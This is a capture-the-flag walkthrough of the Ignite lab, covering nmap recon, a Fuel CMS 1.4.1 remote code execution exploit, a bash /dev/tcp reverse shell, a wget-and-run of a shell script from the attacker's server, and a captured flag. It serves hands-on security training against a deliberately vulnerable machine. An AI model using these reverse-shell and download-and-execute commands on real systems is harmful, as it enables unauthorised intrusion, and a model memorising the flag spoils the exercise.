🔗 Ignite
🎯 Target IP: 10.10.166.221
Create a directory for the machine on the Desktop, which will also hold the nmap scans, and map the target IP to a hostname.
```bash
su
echo "10.10.166.221 ignite.thm" >> /etc/hosts
mkdir -p thm/ignite.thm
cd thm/ignite.thm

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
```
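The cleanup above deletes whatever line happens to be last in /etc/hosts, so anything appended after the lab entry would be removed instead of it. As an added example (not part of the original writeup), here is a tagged add/remove pair in POSIX sh; `HOSTS_FILE` is an assumed override variable so the functions can be exercised on a copy of the file rather than the real one.

```shell
#!/bin/sh
# Added example, not from the original writeup: manage the lab entry in
# /etc/hosts without the fragile `sed -i '$ d'` cleanup. Every lab entry
# carries a tag and is removed by that tag, so unrelated lines are never
# touched. HOSTS_FILE is an assumed override hook used for testing.
set -eu

HOSTS_FILE="${HOSTS_FILE:-/etc/hosts}"   # assumed override for testing
TAG="# thm-lab"                           # marker appended to each lab entry

# add_lab_host IP NAME: append "IP NAME # thm-lab" unless NAME already resolves
add_lab_host() {
    ip="$1"; name="$2"
    if resolve_lab_host "$name" >/dev/null; then
        echo "$name already present in $HOSTS_FILE" >&2
        return 0
    fi
    printf '%s %s %s\n' "$ip" "$name" "$TAG" >> "$HOSTS_FILE"
}

# resolve_lab_host NAME: print the address mapped to NAME (comments ignored);
# exit status 1 if the name is not in the file
resolve_lab_host() {
    found=$(awk -v n="$1" '
        $1 !~ /^#/ { for (i = 2; i <= NF; i++) {
            if ($i ~ /^#/) break
            if ($i == n) { print $1; exit } } }' "$HOSTS_FILE")
    [ -n "$found" ] && printf '%s\n' "$found"
}

# remove_lab_hosts: delete only the lines that carry the lab tag
remove_lab_hosts() {
    sed -i "/${TAG}\$/d" "$HOSTS_FILE"
}

# Typical use (root is needed when HOSTS_FILE is the real /etc/hosts):
#   add_lab_host 10.10.166.221 ignite.thm
#   ... work on the room ...
#   remove_lab_hosts
```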
I prefer to start recon by pinging the target; this allows us to check connectivity and get OS info.
```console
ping -c 3 ignite.thm
PING ignite.thm (10.10.166.221) 56(84) bytes of data.
64 bytes from ignite.thm (10.10.166.221): icmp_seq=1 ttl=63 time=61.5 ms
64 bytes from ignite.thm (10.10.166.221): icmp_seq=2 ttl=63 time=62.8 ms
64 bytes from ignite.thm (10.10.166.221): icmp_seq=3 ttl=63 time=63.7 ms
```
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. This indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
```console
nmap --open -n -Pn -vvv -T4 ignite.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 11:12 EDT
Initiating SYN Stealth Scan at 11:12
Scanning ignite.thm (10.10.166.221) [1000 ports]
Discovered open port 80/tcp on 10.10.166.221
Completed SYN Stealth Scan at 11:12, 0.99s elapsed (1000 total ports)
Nmap scan report for ignite.thm (10.10.166.221)
Host is up, received user-set (0.068s latency).
Scanned at 2023-07-02 11:12:22 EDT for 1s
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
           Raw packets sent: 1000 (44.000KB) | Rcvd: 1000 (40.004KB)
```
| command | result |
|---|---|
| sudo | run as root |
| -sC | run default scripts |
| -sV | enumerate versions |
| -A | aggressive mode |
| -T4 | run a bit faster |
| -oN | output to file with nmap formatting |
```console
nmap -p80 -sCV -T4 ignite.thm -oN port_scan
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/fuel/
```
It looks like there is only one open port on the machine: HTTP.
We can search for exploits with searchsploit:
```console
searchsploit fuel cms 1.4
------------------------------------------------------------------ ---------------------------
 Exploit Title                                                    |  Path
------------------------------------------------------------------ ---------------------------
fuel CMS 1.4.1 - Remote Code Execution (1)                        | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)                        | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)                        | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)       | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)              | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)  | php/webapps/48778.txt
------------------------------------------------------------------ ---------------------------
```
Very good, there are many exploits for this CMS.
Exploring the page, we find some useful info:
```text
To access the FUEL admin, go to:
http://ignite.thm/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in).
```
Now we can try an RCE exploit. First, we download the script from the searchsploit database:
```console
searchsploit -m 50477.py
  Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
      URL: https://www.exploit-db.com/exploits/50477
     Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable
cp: overwrite '/home/kali/50477.py'?
Copied to: /home/kali/50477.py
```
After this, we can launch the exploit:
```bash
python 50477.py -u http://ignite.thm
```
Next we need a reverse shell. First, retrieve our IP address:
```bash
ip -br -c a
```
Then create a shell file with nano:
```bash
nano shell.sh
```
Insert this line for a bash reverse shell:
```bash
/bin/bash -i >& /dev/tcp/10.0.2.15/3333 0>&1
```
Set up a Python web server and a nc listener in two different tabs:
1st tab:
```bash
python -m http.server
```
2nd tab:
```bash
nc -nvlp 3333
```
Now we return to the exploited Fuel CMS tab and run these commands:
```bash
wget http://10.0.2.15:8000/shell.sh -O shell.sh
bash shell.sh
```
The reverse shell is received in the nc terminal:
```bash
/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
```
🚩 Flag 1 (user.txt)
6470e394cbf6dab6a91682cc8585059b